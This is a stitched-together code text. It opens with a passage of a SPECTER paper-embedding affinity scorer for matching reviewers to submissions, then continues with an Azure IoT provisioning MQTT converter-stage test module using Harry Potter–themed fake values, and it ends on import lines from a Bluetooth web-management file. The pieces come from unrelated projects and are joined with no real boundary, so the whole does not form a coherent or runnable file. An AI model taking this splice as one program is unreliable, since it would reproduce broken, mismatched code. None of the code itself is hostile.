        # Fixed idiom: `not x in y` -> `x not in y`.
        if model_type not in DEFAULT_PREDICTORS:
            raise ConfigurationError(f"No default predictor for model type {model_type}.\n"
                                     "Please specify a predictor explicitly.")
        predictor_name = DEFAULT_PREDICTORS[model_type]
    dataset_config = config["dataset_reader"].as_dict()
    if dataset_config['type'] == 'multiprocess':
        # Unwrap the multiprocess wrapper and retarget its features file.
        dataset_config = dataset_config['base_reader']
        if paper_features_path:
            dataset_config['paper_features_path'] = paper_features_path
        dataset_reader_params = Params(dataset_config)
    else:
        dataset_reader_params = config["dataset_reader"]
    dataset_reader = DatasetReader.from_params(dataset_reader_params)
    model = archive.model
    model.eval()  # inference mode (disables dropout etc.)
    return Predictor.by_name(predictor_name)(model, dataset_reader)
class SpecterPredictor:
    """
    Scores submissions against reviewers' publications with SPECTER paper
    embeddings: every paper is embedded, embeddings are L2-normalized, and a
    submission/reviewer affinity is the max (or mean) dot product between the
    submission and the reviewer's publications.
    """

    def __init__(self, specter_dir, work_dir, average_score=False, max_score=True, batch_size=16, use_cuda=True,
                 sparse_value=None, use_redis=False):
        """
        :param specter_dir: directory holding model.tar.gz and data/vocab/
        :param work_dir: scratch directory for intermediate JSON/id files
        :param average_score: aggregate a reviewer's papers by mean similarity
        :param max_score: aggregate a reviewer's papers by max similarity
        :param batch_size: embedding batch size
        :param use_cuda: run the model on GPU 0 when True, else CPU
        :param sparse_value: top-k budget used by sparse_scores
        :param use_redis: cache publication embeddings in RedisAI
        """
        self.specter_dir = specter_dir
        self.model_archive_file = os.path.join(specter_dir, "model.tar.gz")
        self.vocab_dir = os.path.join(specter_dir, "data/vocab/")
        self.predictor_name = "specter_predictor"
        self.work_dir = work_dir
        self.average_score = average_score
        self.max_score = max_score
        # Exactly one aggregation mode may be enabled.
        assert max_score ^ average_score, "(Only) One of max_score or average_score must be True"
        self.batch_size = batch_size
        if use_cuda:
            self.cuda_device = 0
        else:
            self.cuda_device = -1
        self.preliminary_scores = None
        self.sparse_value = sparse_value
        # Fixed: the original guarded with `not exists and not isdir` (isdir
        # implies exists, so the second test was redundant) and raced with
        # concurrent creation; exist_ok=True handles both cases.
        os.makedirs(self.work_dir, exist_ok=True)
        self.use_redis = use_redis
        if use_redis:
            self.redis = redisai.Client(connection_pool=redis_embeddings_pool)
        else:
            self.redis = None

    def set_archives_dataset(self, archives_dataset):
        """
        Registers reviewers' publications ({profile_id: [publication, ...]}).
        Builds note<->author lookup tables and writes the metadata JSON and
        id list consumed by embed_publications. Publications with neither
        title nor abstract are skipped; with Redis caching enabled, papers
        that already have a cached embedding are not queued for embedding.
        """
        self.pub_note_id_to_author_ids = defaultdict(list)
        self.pub_author_ids_to_note_id = defaultdict(list)
        self.pub_note_id_to_abstract = {}
        self.pub_note_id_to_title = {}
        output_dict = {}
        paper_ids_list = []
        for profile_id, publications in archives_dataset.items():
            for publication in publications:
                # Robustness fix: content.get('title') may be None, which the
                # original crashed on with .strip(); treat None as "".
                title = (publication['content'].get('title') or "").strip()
                abstract = (publication['content'].get('abstract') or "").strip()
                if title or abstract:
                    note_id = publication['id']
                    self.pub_note_id_to_author_ids[note_id].append(profile_id)
                    self.pub_author_ids_to_note_id[profile_id].append(note_id)
                    # "." is a placeholder so SPECTER always sees non-empty text.
                    self.pub_note_id_to_title[note_id] = title if title else "."
                    self.pub_note_id_to_abstract[note_id] = abstract if abstract else "."
                    if self.redis is None or not self.redis.exists(note_id):
                        if note_id in output_dict:
                            # Same paper seen under another author profile.
                            output_dict[note_id]["authors"].append(profile_id)
                        else:
                            paper_ids_list.append(note_id)
                            output_dict[note_id] = {"title": self.pub_note_id_to_title[note_id],
                                                    "abstract": self.pub_note_id_to_abstract[note_id],
                                                    "paper_id": note_id,
                                                    "authors": [profile_id]}
                else:
                    print(f"Skipping publication {publication['id']}. Either title or abstract must be provided ")
        with open(os.path.join(self.work_dir, "specter_reviewer_paper_data.json"), 'w') as f_out:
            json.dump(output_dict, f_out, indent=1)
        with open(os.path.join(self.work_dir, "specter_reviewer_paper_ids.txt"), 'w') as f_out:
            f_out.write('\n'.join(paper_ids_list) + '\n')

    def set_submissions_dataset(self, submissions_dataset):
        """
        Registers the submissions to score ({note_id: submission}). Builds
        title/abstract lookups and writes the metadata JSON and id list that
        embed_submissions consumes.
        """
        self.sub_note_id_to_abstract = {}
        self.sub_note_id_to_title = {}
        output_dict = {}
        paper_ids_list = []
        for note_id, submission in submissions_dataset.items():
            self.sub_note_id_to_title[submission['id']] = submission['content'].get('title', "")
            self.sub_note_id_to_abstract[submission['id']] = submission['content'].get('abstract', "")
            paper_ids_list.append(submission['id'])
            output_dict[submission['id']] = {"title": self.sub_note_id_to_title[submission['id']],
                                             "abstract": self.sub_note_id_to_abstract[submission['id']],
                                             "paper_id": submission["id"],
                                             "authors": []}
        with open(os.path.join(self.work_dir, "specter_submission_paper_data.json"), 'w') as f_out:
            json.dump(output_dict, f_out, indent=1)
        with open(os.path.join(self.work_dir, "specter_submission_paper_ids.txt"), 'w') as f_out:
            f_out.write('\n'.join(paper_ids_list) + '\n')

    def _build_overrides(self, metadata_file):
        """
        Return the JSON overrides string that switches the archived SPECTER
        config into predict mode and points the reader at `metadata_file`.
        Extracted because embed_submissions and embed_publications previously
        duplicated this entire structure.
        """
        return json.dumps({'model': {'predict_mode': 'true', 'include_venue': 'false',
                                     'text_field_embedder': {
                                         'token_embedders': {
                                             'bert': {
                                                 'pretrained_model': os.path.join(self.specter_dir,
                                                                                  "data/scibert_scivocab_uncased/scibert.tar.gz")
                                             }
                                         }
                                     }
                                     },
                           "train_data_path": os.path.join(self.specter_dir, "data/train.csv"),
                           "validation_data_path": os.path.join(self.specter_dir, "data/val.csv"),
                           "test_data_path": os.path.join(self.specter_dir, "data/test.csv"),
                           'dataset_reader': {'type': 'specter_data_reader', 'predict_mode': 'true',
                                              'paper_features_path': metadata_file,
                                              'included_text_fields': 'abstract title',
                                              'cache_path': os.path.join(self.specter_dir,
                                                                         'data/dataset-instance-cache/'),
                                              'data_file': os.path.join(self.specter_dir, 'data/train.json'),
                                              'token_indexers': {
                                                  'bert': {
                                                      "pretrained_model": os.path.join(self.specter_dir,
                                                                                       "data/scibert_scivocab_uncased/vocab.txt")
                                                  }
                                              }
                                              },
                           'vocabulary': {'directory_path': self.vocab_dir}
                           })

    def embed_submissions(self, submissions_path=None):
        """Embed every registered submission, writing JSONL to submissions_path."""
        print('Embedding submissions...')
        metadata_file = os.path.join(self.work_dir, "specter_submission_paper_data.json")
        ids_file = os.path.join(self.work_dir, "specter_submission_paper_ids.txt")
        archive = load_archive(self.model_archive_file,
                               weights_file=None,
                               cuda_device=self.cuda_device,
                               overrides=self._build_overrides(metadata_file))
        predictor = predictor_from_archive(archive, self.predictor_name, metadata_file)
        manager = _PredictManagerCustom(predictor,
                                        ids_file,
                                        submissions_path,
                                        self.batch_size,
                                        False,
                                        False)
        manager.run()

    def embed_publications(self, publications_path=None):
        """Embed reviewers' publications to publications_path and/or Redis."""
        if not self.use_redis:
            assert publications_path, "Either publications_path must be given or use_redis must be set to true"
        print('Embedding publications...')
        metadata_file = os.path.join(self.work_dir, "specter_reviewer_paper_data.json")
        ids_file = os.path.join(self.work_dir, "specter_reviewer_paper_ids.txt")
        archive = load_archive(self.model_archive_file,
                               weights_file=None,
                               cuda_device=self.cuda_device,
                               overrides=self._build_overrides(metadata_file))
        predictor = predictor_from_archive(archive, self.predictor_name, metadata_file)
        redis_client = self.redis.client() if self.use_redis else None
        manager = _PredictManagerCustom(predictor,
                                        ids_file,
                                        publications_path,
                                        self.batch_size,
                                        False,
                                        False,
                                        store_redis=self.use_redis,
                                        redis_con=redis_client)
        manager.run()

    def all_scores(self, publications_path=None, submissions_path=None, scores_path=None):
        """
        Computes an affinity score for every (submission, reviewer) pair from
        the cached embeddings and stores them in self.preliminary_scores as
        (note_id, reviewer_id, score) tuples; optionally writes a CSV.
        """
        def load_emb_file(emb_file):
            # Parse a JSONL embedding file. Papers with empty embeddings get a
            # zero vector (keeps rows aligned with id_list) and are recorded
            # in bad_id_set so they are excluded from scoring later.
            paper_emb_size_default = 768
            id_list = []
            emb_list = []
            bad_id_set = set()
            for line in emb_file:
                paper_data = json.loads(line.rstrip())
                paper_id = paper_data['paper_id']
                paper_emb_size = len(paper_data['embedding'])
                assert paper_emb_size == 0 or paper_emb_size == paper_emb_size_default
                if paper_emb_size == 0:
                    paper_emb = [0] * paper_emb_size_default
                    bad_id_set.add(paper_id)
                else:
                    paper_emb = paper_data['embedding']
                id_list.append(paper_id)
                emb_list.append(paper_emb)
            emb_tensor = torch.tensor(emb_list, device=torch.device('cpu'))
            # L2-normalize so the dot products below are cosine similarities.
            emb_tensor = emb_tensor / (emb_tensor.norm(dim=1, keepdim=True) + 0.000000000001)
            print(len(bad_id_set))
            return emb_tensor, id_list, bad_id_set

        def load_from_redis():
            paper_emb_size_default = 768
            id_list = list(self.pub_note_id_to_title.keys())
            emb_list = []
            bad_id_set = set()
            for paper_id in id_list:
                try:
                    paper_emb = self.redis.tensorget(key=paper_id, as_numpy_mutable=True)
                    assert len(paper_emb) == paper_emb_size_default
                    emb_list.append(paper_emb)
                except Exception:
                    # Fixed: the original dropped the row entirely on failure,
                    # shifting every subsequent paper's row and misaligning
                    # paper_id2train_idx with the embedding tensor. Append a
                    # zero row instead (bad ids are filtered out below anyway).
                    emb_list.append(np.zeros(paper_emb_size_default))
                    bad_id_set.add(paper_id)
            emb_tensor = torch.tensor(emb_list, device=torch.device('cpu'))
            emb_tensor = emb_tensor / (emb_tensor.norm(dim=1, keepdim=True) + 0.000000000001)
            if bad_id_set:
                print(f"No Embedding found for {len(bad_id_set)} Papers: ")
                print(bad_id_set)
            return emb_tensor, id_list, bad_id_set

        print('Loading cached publications...')
        if self.use_redis:
            paper_emb_train, train_id_list, train_bad_id_set = load_from_redis()
        else:
            with open(publications_path) as f_in:
                paper_emb_train, train_id_list, train_bad_id_set = load_emb_file(f_in)
        paper_num_train = len(train_id_list)
        paper_id2train_idx = {}
        for idx, paper_id in enumerate(train_id_list):
            paper_id2train_idx[paper_id] = idx
        with open(submissions_path) as f_in:
            print('Loading cached submissions...')
            paper_emb_test, test_id_list, test_bad_id_set = load_emb_file(f_in)
        paper_num_test = len(test_id_list)
        print('Computing all scores...')
        # Rows are normalized, so each entry is the cosine similarity between
        # one test (submission) paper and one train (publication) paper.
        p2p_aff = torch.empty((paper_num_test, paper_num_train), device=torch.device('cpu'))
        for i in range(paper_num_test):
            p2p_aff[i, :] = torch.sum(paper_emb_test[i, :].unsqueeze(dim=0) * paper_emb_train, dim=1)
        csv_scores = []
        self.preliminary_scores = []
        for reviewer_id, train_note_id_list in self.pub_author_ids_to_note_id.items():
            if len(train_note_id_list) == 0:
                continue
            # Keep only this reviewer's papers that embedded successfully.
            train_paper_idx = []
            for paper_id in train_note_id_list:
                if paper_id not in train_bad_id_set:
                    train_paper_idx.append(paper_id2train_idx[paper_id])
            train_paper_aff_j = p2p_aff[:, train_paper_idx]
            if self.average_score:
                all_paper_aff = train_paper_aff_j.mean(dim=1)
            elif self.max_score:
                all_paper_aff = train_paper_aff_j.max(dim=1)[0]
            for j in range(paper_num_test):
                csv_line = '{note_id},{reviewer},{score}'.format(note_id=test_id_list[j], reviewer=reviewer_id,
                                                                 score=all_paper_aff[j].item())
                csv_scores.append(csv_line)
                self.preliminary_scores.append((test_id_list[j], reviewer_id, all_paper_aff[j].item()))
        if scores_path:
            with open(scores_path, 'w') as f:
                for csv_line in csv_scores:
                    f.write(csv_line + '\n')
        return self.preliminary_scores

    def _sparse_scores_helper(self, all_scores, id_index):
        """
        Add the top `self.sparse_value` entries of each group (grouped by the
        tuple field at `id_index`) from the pre-sorted preliminary_scores
        into the `all_scores` set.
        """
        counter = 0
        # Get the first note_id or profile_id
        current_id = self.preliminary_scores[0][id_index]
        if id_index == 0:
            desc = 'Note IDs'
        else:
            desc = 'Profiles IDs'
        for note_id, profile_id, score in tqdm(self.preliminary_scores, total=len(self.preliminary_scores), desc=desc):
            if counter < self.sparse_value:
                all_scores.add((note_id, profile_id, score))
            elif (note_id, profile_id)[id_index] != current_id:
                # New group: reset the budget and keep its first (highest) entry.
                counter = 0
                all_scores.add((note_id, profile_id, score))
            current_id = (note_id, profile_id)[id_index]
            counter += 1
        return all_scores

    def sparse_scores(self, scores_path=None):
        """
        Keeps only the top `sparse_value` scores per note and per profile
        (union of both passes), optionally writing them to scores_path as CSV.
        Must be called after all_scores.
        """
        if self.preliminary_scores is None:
            raise RuntimeError("Call all_scores before calling sparse_scores")
        print('Sorting...')
        self.preliminary_scores.sort(key=lambda x: (x[0], x[2]), reverse=True)
        print('Sort 1 complete')
        all_scores = set()
        # They are first sorted by note_id
        all_scores = self._sparse_scores_helper(all_scores, 0)
        # Sort by profile_id
        print('Sorting...')
        self.preliminary_scores.sort(key=lambda x: (x[1], x[2]), reverse=True)
        print('Sort 2 complete')
        all_scores = self._sparse_scores_helper(all_scores, 1)
        print('Final Sort...')
        all_scores = sorted(list(all_scores), key=lambda x: (x[0], x[2]), reverse=True)
        if scores_path:
            with open(scores_path, 'w') as f:
                for note_id, profile_id, score in all_scores:
                    f.write('{0},{1},{2}\n'.format(note_id, profile_id, score))
        print('Sparse score computation complete')
        return all_scores
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import logging
import pytest
import sys
import six.moves.urllib as urllib
from azure.iot.device import constant
from azure.iot.device.common.pipeline import (
pipeline_ops_base,
pipeline_stages_base,
pipeline_ops_mqtt,
pipeline_events_mqtt,
)
from azure.iot.device.provisioning.pipeline import (
pipeline_events_provisioning,
pipeline_ops_provisioning,
pipeline_stages_provisioning_mqtt,
)
from tests.common.pipeline.helpers import (
assert_callback_failed,
assert_callback_succeeded,
all_common_ops,
all_common_events,
all_except,
make_mock_stage,
UnhandledException,
)
from tests.provisioning.pipeline.helpers import all_provisioning_ops, all_provisioning_events
from tests.common.pipeline import pipeline_stage_test
logging.basicConfig(level=logging.INFO)
# Handle on this module so auto-generated tests can be attached to it below.
this_module = sys.modules[__name__]
# This fixture makes it look like all test in this file tests are running
# inside the pipeline thread. Because this is an autouse fixture, we
# manually add it to the individual test.py files that need it. If,
# instead, we had added it to some conftest.py, it would be applied to
# every tests in every file and we don't want that.
@pytest.fixture(autouse=True)
def apply_fake_pipeline_thread(fake_pipeline_thread):
    pass
# Fake constants used to build operations/events throughout these tests.
fake_device_id = "elder_wand"
fake_registration_id = "registered_remembrall"
fake_provisioning_host = "hogwarts.com"
fake_id_scope = "weasley_wizard_wheezes"
fake_sas_token = "<PASSWORD>_token"
fake_security_client = "secure_via_muffliato"
fake_request_id = "fake_request_1234"
fake_mqtt_payload = "hello hogwarts"
fake_operation_id = "fake_operation_9876"
fake_client_cert = "fake_client_cert"
invalid_feature_name = "__invalid_feature_name__"
unmatched_mqtt_topic = "__unmatched_mqtt_topic__"
# DPS response topic the converter stage is expected to recognize.
fake_response_topic = "$dps/registrations/res/200/?$rid={}".format(fake_request_id)
# Operations/events this stage is expected to intercept; everything else must
# be passed through untouched (verified by the auto-generated base tests).
ops_handled_by_this_stage = [
    pipeline_ops_provisioning.SetProvisioningClientConnectionArgsOperation,
    pipeline_ops_provisioning.SendRegistrationRequestOperation,
    pipeline_ops_provisioning.SendQueryRequestOperation,
    pipeline_ops_base.EnableFeatureOperation,
    pipeline_ops_base.DisableFeatureOperation,
]
events_handled_by_this_stage = [pipeline_events_mqtt.IncomingMQTTMessageEvent]
# Auto-generate the standard suite of base pipeline-stage tests on this module.
pipeline_stage_test.add_base_pipeline_stage_tests(
    cls=pipeline_stages_provisioning_mqtt.ProvisioningMQTTConverterStage,
    module=this_module,
    all_ops=all_common_ops + all_provisioning_ops,
    handled_ops=ops_handled_by_this_stage,
    all_events=all_common_events + all_provisioning_events,
    handled_events=events_handled_by_this_stage,
    extra_initializer_defaults={"action_to_topic": dict},
)
@pytest.fixture(scope="function")
def some_exception():
    # A fresh, recognizable Exception instance for failure-injection tests.
    return Exception("Alohomora")
@pytest.fixture
def mock_stage(mocker):
    # The stage under test, wired to a mocked next stage.
    return make_mock_stage(mocker, pipeline_stages_provisioning_mqtt.ProvisioningMQTTConverterStage)
@pytest.fixture
def set_security_client_args(callback):
    # A "set connection args" operation built from the fake values above.
    op = pipeline_ops_provisioning.SetProvisioningClientConnectionArgsOperation(
        provisioning_host=fake_provisioning_host,
        registration_id=fake_registration_id,
        id_scope=fake_id_scope,
        sas_token=fake_sas_token,
        client_cert=fake_client_cert,
        callback=callback,
    )
    return op
@pytest.fixture
def stages_configured(mock_stage, set_security_client_args, mocker):
    # Run the connection-args op through the stage so later ops operate on a
    # configured stage, then reset mocks so call counts start from zero.
    set_security_client_args.callback = None
    mock_stage.run_op(set_security_client_args)
    mocker.resetall()
@pytest.mark.describe(
    "ProvisioningMQTTConverterStage run_op function with SetProvisioningClientConnectionArgsOperation"
)
class TestProvisioningMQTTConverterWithSetProvisioningClientConnectionArgsOperation(object):
    # Verifies the provisioning connection-args op is converted into a
    # pipeline_ops_mqtt.SetMQTTConnectionArgsOperation with every field mapped
    # correctly, and that callback success/failure semantics are preserved.

    @pytest.mark.it(
        "Runs a pipeline_ops_mqtt.SetMQTTConnectionArgsOperation operation on the next stage"
    )
    def test_runs_set_connection_args(self, mock_stage, set_security_client_args):
        mock_stage.run_op(set_security_client_args)
        assert mock_stage.next._execute_op.call_count == 1
        new_op = mock_stage.next._execute_op.call_args[0][0]
        assert isinstance(new_op, pipeline_ops_mqtt.SetMQTTConnectionArgsOperation)

    @pytest.mark.it(
        "Sets SetMQTTConnectionArgsOperation.client_id = SetProvisioningClientConnectionArgsOperation.registration_id"
    )
    def test_sets_client_id(self, mock_stage, set_security_client_args):
        mock_stage.run_op(set_security_client_args)
        new_op = mock_stage.next._execute_op.call_args[0][0]
        assert new_op.client_id == fake_registration_id

    @pytest.mark.it(
        "Sets SetMQTTConnectionArgsOperation.hostname = SetProvisioningClientConnectionArgsOperation.provisioning_host"
    )
    def test_sets_hostname(self, mock_stage, set_security_client_args):
        mock_stage.run_op(set_security_client_args)
        new_op = mock_stage.next._execute_op.call_args[0][0]
        assert new_op.hostname == fake_provisioning_host

    @pytest.mark.it(
        "Sets SetMQTTConnectionArgsOperation.client_cert = SetProvisioningClientConnectionArgsOperation.client_cert"
    )
    def test_sets_client_cert(self, mock_stage, set_security_client_args):
        mock_stage.run_op(set_security_client_args)
        new_op = mock_stage.next._execute_op.call_args[0][0]
        assert new_op.client_cert == fake_client_cert

    @pytest.mark.it(
        "Sets SetMQTTConnectionArgsOperation.sas_token = SetProvisioningClientConnectionArgsOperation.sas_token"
    )
    def test_sets_sas_token(self, mock_stage, set_security_client_args):
        mock_stage.run_op(set_security_client_args)
        new_op = mock_stage.next._execute_op.call_args[0][0]
        assert new_op.sas_token == fake_sas_token

    @pytest.mark.it(
        "Sets MqttConnectionArgsOperation.username = SetProvisioningClientConnectionArgsOperation.{id_scope}/registrations/{registration_id}/api-version={api_version}&ClientVersion={client_version}"
    )
    def test_sets_username(self, mock_stage, set_security_client_args):
        mock_stage.run_op(set_security_client_args)
        new_op = mock_stage.next._execute_op.call_args[0][0]
        # Username must follow the DPS MQTT username format; the user agent is
        # URL-encoded (quote_plus) before being embedded.
        assert (
            new_op.username
            == "{id_scope}/registrations/{registration_id}/api-version={api_version}&ClientVersion={client_version}".format(
                id_scope=fake_id_scope,
                registration_id=fake_registration_id,
                api_version=constant.PROVISIONING_API_VERSION,
                client_version=urllib.parse.quote_plus(constant.USER_AGENT),
            )
        )

    @pytest.mark.it(
        "Calls the SetSymmetricKeySecurityClientArgs callback with error if the pipeline_ops_mqtt.SetMQTTConnectionArgsOperation operation raises an Exception"
    )
    def test_set_connection_args_raises_exception(
        self, mock_stage, mocker, some_exception, set_security_client_args
    ):
        mock_stage.next._execute_op = mocker.Mock(side_effect=some_exception)
        mock_stage.run_op(set_security_client_args)
        assert_callback_failed(op=set_security_client_args, error=some_exception)

    @pytest.mark.it(
        "Allows any BaseExceptions raised inside the pipeline_ops_mqtt.SetMQTTConnectionArgsOperation operation to propagate"
    )
    def test_set_connection_args_raises_base_exception(
        self, mock_stage, mocker, fake_base_exception, set_security_client_args
    ):
        mock_stage.next._execute_op = mocker.Mock(side_effect=fake_base_exception)
        with pytest.raises(UnhandledException):
            mock_stage.run_op(set_security_client_args)

    @pytest.mark.it(
        "Calls the SetSymmetricKeySecurityClientArgs callback with no error if the pipeline_ops_mqtt.SetMQTTConnectionArgsOperation operation succeeds"
    )
    def test_returns_success_if_set_connection_args_succeeds(
        self, mock_stage, mocker, set_security_client_args
    ):
        mock_stage.run_op(set_security_client_args)
        assert_callback_succeeded(op=set_security_client_args)
# Parameters for the generic conversion tests below: each provisioning op,
# the kwargs needed to build it, and the MQTT op class it should become.
basic_ops = [
    {
        "op_class": pipeline_ops_provisioning.SendRegistrationRequestOperation,
        "op_init_kwargs": {"request_id": fake_request_id, "request_payload": fake_mqtt_payload},
        "new_op_class": pipeline_ops_mqtt.MQTTPublishOperation,
    },
    {
        "op_class": pipeline_ops_provisioning.SendQueryRequestOperation,
        "op_init_kwargs": {
            "request_id": fake_request_id,
            "operation_id": fake_operation_id,
            "request_payload": fake_mqtt_payload,
        },
        "new_op_class": pipeline_ops_mqtt.MQTTPublishOperation,
    },
    {
        "op_class": pipeline_ops_base.EnableFeatureOperation,
        "op_init_kwargs": {"feature_name": None},
        "new_op_class": pipeline_ops_mqtt.MQTTSubscribeOperation,
    },
    {
        "op_class": pipeline_ops_base.DisableFeatureOperation,
        "op_init_kwargs": {"feature_name": None},
        "new_op_class": pipeline_ops_mqtt.MQTTUnsubscribeOperation,
    },
]
@pytest.fixture
def op(params, callback):
    # Build the parametrized operation and attach the shared callback fixture.
    built_op = params["op_class"](**params["op_init_kwargs"])
    built_op.callback = callback
    return built_op
@pytest.mark.parametrize(
    "params",
    basic_ops,
    ids=["{}->{}".format(x["op_class"].__name__, x["new_op_class"].__name__) for x in basic_ops],
)
@pytest.mark.describe("ProvisioningMQTTConverterStage basic operation tests")
class TestProvisioningMQTTConverterBasicOperations(object):
    # Behavior shared by every op->op conversion in `basic_ops`: correct new
    # op type, callback failure on Exception, BaseException propagation, and
    # callback success when the converted op completes.

    @pytest.mark.it("Runs an operation on the next stage")
    def test_runs_publish(self, params, mock_stage, stages_configured, op):
        mock_stage.run_op(op)
        new_op = mock_stage.next._execute_op.call_args[0][0]
        assert isinstance(new_op, params["new_op_class"])

    @pytest.mark.it("Calls the original op callback with error if the new_op raises an Exception")
    def test_new_op_raises_exception(
        self, params, mocker, mock_stage, stages_configured, op, some_exception
    ):
        mock_stage.next._execute_op = mocker.Mock(side_effect=some_exception)
        mock_stage.run_op(op)
        assert_callback_failed(op=op, error=some_exception)

    @pytest.mark.it("Allows any BaseExceptions raised from inside new_op to propagate")
    def test_new_op_raises_base_exception(
        self, params, mocker, mock_stage, stages_configured, op, fake_base_exception
    ):
        mock_stage.next._execute_op = mocker.Mock(side_effect=fake_base_exception)
        with pytest.raises(UnhandledException):
            mock_stage.run_op(op)

    @pytest.mark.it("Calls the original op callback with no error if the new_op operation succeeds")
    def test_returns_success_if_publish_succeeds(self, params, mock_stage, stages_configured, op):
        mock_stage.run_op(op)
        assert_callback_succeeded(op)
# Parameters for publish-type operations: the exact DPS topic string and
# payload each provisioning op is expected to publish with.
publish_ops = [
    {
        "name": "send register request",
        "op_class": pipeline_ops_provisioning.SendRegistrationRequestOperation,
        "op_init_kwargs": {"request_id": fake_request_id, "request_payload": fake_mqtt_payload},
        "topic": "$dps/registrations/PUT/iotdps-register/?$rid={request_id}".format(
            request_id=fake_request_id
        ),
        "publish_payload": fake_mqtt_payload,
    },
    {
        "name": "send query request",
        "op_class": pipeline_ops_provisioning.SendQueryRequestOperation,
        "op_init_kwargs": {
            "request_id": fake_request_id,
            "operation_id": fake_operation_id,
            "request_payload": fake_mqtt_payload,
        },
        "topic": "$dps/registrations/GET/iotdps-get-operationstatus/?$rid={request_id}&operationId={operation_id}".format(
            request_id=fake_request_id, operation_id=fake_operation_id
        ),
        "publish_payload": fake_mqtt_payload,
    },
]
@pytest.mark.parametrize("params", publish_ops, ids=[x["name"] for x in publish_ops])
@pytest.mark.describe("ProvisioningMQTTConverterStage run_op function for publish operations")
class TestProvisioningMQTTConverterForPublishOps(object):
    # Checks topic string and payload of the resulting MQTTPublishOperation.

    @pytest.mark.it("Uses correct registration topic string when publishing")
    def test_uses_topic_for(self, mock_stage, stages_configured, params, op):
        mock_stage.run_op(op)
        new_op = mock_stage.next._execute_op.call_args[0][0]
        assert new_op.topic == params["topic"]

    @pytest.mark.it("Sends correct payload when publishing")
    def test_sends_correct_body(self, mock_stage, stages_configured, params, op):
        mock_stage.run_op(op)
        new_op = mock_stage.next._execute_op.call_args[0][0]
        assert new_op.payload == params["publish_payload"]
sub_unsub_operations = [
{
"op_class": pipeline_ops_base.EnableFeatureOperation,
"new_op": pipeline_ops_mqtt.MQTTSubscribeOperation,
},
{
"op_class": pipeline_ops_base.DisableFeatureOperation,
"new_op": pipeline_ops_mqtt.MQTTUnsubscribeOperation,
},
]
@pytest.mark.describe("ProvisioningMQTTConverterStage run_op function with EnableFeature operation")
class TestProvisioningMQTTConverterWithEnable(object):
    """Verifies that enable/disable-feature ops become MQTT (un)subscribe ops
    on the DPS response topic."""

    @pytest.mark.parametrize(
        "op_parameters",
        sub_unsub_operations,
        ids=[x["op_class"].__name__ for x in sub_unsub_operations],
    )
    @pytest.mark.it("Gets the correct topic")
    def test_converts_feature_name_to_topic(
        self, mocker, mock_stage, stages_configured, op_parameters
    ):
        # All DPS responses arrive on this single wildcard topic.
        topic = "$dps/registrations/res/#"
        mock_stage.next._execute_op = mocker.Mock()
        op = op_parameters["op_class"](feature_name=None)
        mock_stage.run_op(op)
        new_op = mock_stage.next._execute_op.call_args[0][0]
        # Enable -> subscribe, Disable -> unsubscribe, both on the DPS topic.
        assert isinstance(new_op, op_parameters["new_op"])
        assert new_op.topic == topic
@pytest.fixture
def add_pipeline_root(mock_stage, mocker):
    # Attach a real PipelineRootStage above the stage under test and spy on
    # its handle_pipeline_event so tests can assert that events were passed
    # upward by the converter stage.
    root = pipeline_stages_base.PipelineRootStage()
    mocker.spy(root, "handle_pipeline_event")
    mock_stage.previous = root
@pytest.mark.describe("ProvisioningMQTTConverterStage _handle_pipeline_event")
class TestProvisioningMQTTConverterHandlePipelineEvent(object):
    """Tests for pass-through behavior of unrecognized incoming MQTT events."""

    @pytest.mark.it("Passes up any mqtt messages with topics that aren't matched by this stage")
    def test_passes_up_mqtt_message_with_unknown_topic(
        self, mock_stage, stages_configured, add_pipeline_root, mocker
    ):
        event = pipeline_events_mqtt.IncomingMQTTMessageEvent(
            topic=unmatched_mqtt_topic, payload=fake_mqtt_payload
        )
        mock_stage.handle_pipeline_event(event)
        # The identical event object must be forwarded upward exactly once.
        assert mock_stage.previous.handle_pipeline_event.call_count == 1
        assert mock_stage.previous.handle_pipeline_event.call_args == mocker.call(event)
@pytest.fixture
def dps_response_event():
    # An incoming MQTT message on the DPS response topic, encoded as the
    # transport would deliver it (payload as UTF-8 bytes).
    return pipeline_events_mqtt.IncomingMQTTMessageEvent(
        topic=fake_response_topic, payload=fake_mqtt_payload.encode("utf-8")
    )
@pytest.mark.describe("ProvisioningMQTTConverterStage _handle_pipeline_event for response")
class TestProvisioningMQTTConverterHandlePipelineEventRegistrationResponse(object):
    """Tests for conversion of incoming DPS response MQTT messages into
    RegistrationResponseEvent objects."""

    @pytest.mark.it(
        "Converts mqtt message with topic $dps/registrations/res/#/ to registration response event"
    )
    def test_converts_response_topic_to_registration_response_event(
        self, mocker, mock_stage, stages_configured, add_pipeline_root, dps_response_event
    ):
        mock_stage.handle_pipeline_event(dps_response_event)
        # Exactly one converted event must be sent up the pipeline.
        assert mock_stage.previous.handle_pipeline_event.call_count == 1
        new_event = mock_stage.previous.handle_pipeline_event.call_args[0][0]
        assert isinstance(new_event, pipeline_events_provisioning.RegistrationResponseEvent)

    # NOTE(review): the marker text mentions "c2d messages", but this test
    # exercises a DPS response topic — the description looks copy-pasted.
    @pytest.mark.it("Extracts message properties from the mqtt topic for c2d messages")
    def test_extracts_some_properties_from_topic(
        self, mocker, mock_stage, stages_configured, add_pipeline_root, dps_response_event
    ):
        mock_stage.handle_pipeline_event(dps_response_event)
        new_event = mock_stage.previous.handle_pipeline_event.call_args[0][0]
        # Values the stage is expected to parse out of fake_response_topic.
        assert new_event.request_id == fake_request_id
        assert new_event.status_code == "200"

    @pytest.mark.it("Passes up other messages")
    def test_if_topic_is_not_response(
        self, mocker, mock_stage, stages_configured, add_pipeline_root
    ):
        # A c2d-style topic this stage does not recognize must be forwarded
        # unchanged to the previous (upper) stage.
        fake_some_other_topic = "devices/{}/messages/devicebound/".format(fake_device_id)
        event = pipeline_events_mqtt.IncomingMQTTMessageEvent(
            topic=fake_some_other_topic, payload=fake_mqtt_payload
        )
        mock_stage.handle_pipeline_event(event)
        assert mock_stage.previous.handle_pipeline_event.call_count == 1
        assert mock_stage.previous.handle_pipeline_event.call_args == mocker.call(event)
# --- end of test module ---
# Source repository: LairdCP/weblcm-python
from typing import List, Optional
import cherrypy
import dbus
import dbus.exceptions
import dbus.mainloop.glib
import dbus.service
import weblcm_bluetooth_plugin
import weblcm_def
from weblcm_ble import (
find_controller, find_controllers, controller_pretty_name, find_device, find_devices,
DEVICE_IFACE, ADAPTER_IFACE, python_to_dbus, AgentSingleton, BLUEZ_SERVICE_NAME, uri_to_uuid
)
